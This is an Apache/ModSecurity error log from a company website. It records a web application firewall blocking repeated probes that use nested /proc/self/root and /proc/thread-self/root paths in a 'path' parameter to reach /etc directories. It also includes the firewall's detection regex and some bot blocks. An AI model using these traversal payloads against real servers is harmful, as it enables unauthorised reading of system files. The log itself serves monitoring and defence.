[Wed Mar 18 12:44:34.980665 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:53816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrIYsdf6f5d65gmYZTpZQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:44:42.365838 2026] [mime_magic:error] [pid 11816:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:34836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/systemd
[Wed Mar 18 12:44:58.733768 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:57418] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:45:10.495666 2026] [mime_magic:error] [pid 29882:tid 140411674785536] (70014)End of file found: [client 57.141.18.7:44414] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:45:14.188389 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:54696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrIieyqAr6etmhZHNraGgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:45:18.205807 2026] [mime_magic:error] [pid 11816:tid 140411616036608] (70014)End of file found: [client 57.141.18.53:44636] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:45:19.209794 2026] [mime_magic:error] [pid 11816:tid 140411540502272] (70014)End of file found: [client 57.141.18.38:44932] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:46:05.093791 2026] [mime_magic:error] [pid 26799:tid 140411741927168] (70014)End of file found: [client 57.141.18.55:47744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:46:07.741564 2026] [:error] [pid 29882:tid 140411725141760] [client 216.73.216.191:47916] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrIv0zinOy1jxa1j4cqowAAAQI"]
[Wed Mar 18 12:46:15.339289 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:60422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrIximAPhZkrhU8w4mCKAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:46:31.351943 2026] [mime_magic:error] [pid 29882:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:49248] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:46:31.377779 2026] [mime_magic:error] [pid 26799:tid 140411641214720] (70014)End of file found: [client 57.141.18.33:49512] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:46:54.708100 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:41560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrI7gkwaGbbGflqUZAlpgAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:48:39.872872 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:57710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJV-w_le52K8_3pV3z5AAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:48:49.558671 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:41262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJYda6ubjKNq_cu4ayRAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:48:59.883047 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.228.61:46802] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrJa0zinOy1jxa1j4crTQAAARI"]
[Wed Mar 18 12:49:03.760411 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:41348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJb-oXxyEfFpUF8f-CpQAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:49:05.754950 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.244.43:53606] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrJcda6ubjKNq_cu4ayUwAAA0A"]
[Wed Mar 18 12:49:34.943305 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:48632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJjkzinOy1jxa1j4crewAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:50:32.331108 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:55278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJyNa6ubjKNq_cu4ayfwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 12:50:39.793872 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:42160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJz0zinOy1jxa1j4cr0AAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:50:47.127158 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:34106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrJ19Y0UrI5A3LftIzI1QAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:50:51.407279 2026] [mime_magic:error] [pid 31803:tid 140411632822016] (70014)End of file found: [client 74.7.243.128:50836] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/systemd/user
[Wed Mar 18 12:51:16.105787 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 57.141.18.25:33426] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:51:36.475173 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:38568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrKCOoXxyEfFpUF8f-DJQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:52:47.523432 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:48420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrKT_u8EFLIOrSqIpsZcQAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:53:57.574470 2026] [mime_magic:error] [pid 11816:tid 140411691570944] (70014)End of file found: [client 57.141.18.99:40246] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:54:13.127552 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:42356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrKpda6ubjKNq_cu4azqwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:54:36.239407 2026] [mime_magic:error] [pid 15051:tid 140411632822016] (70014)End of file found: [client 57.141.18.66:41808] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:54:54.445403 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:38412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrKzuw_le52K8_3pV31KwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:55:00.615448 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:52266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrK1Ow_le52K8_3pV31OAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:55:09.087008 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:59436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrK3eoXxyEfFpUF8f-DxQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:55:14.497997 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:44858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrK4sdf6f5d65gmYZTrdgAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
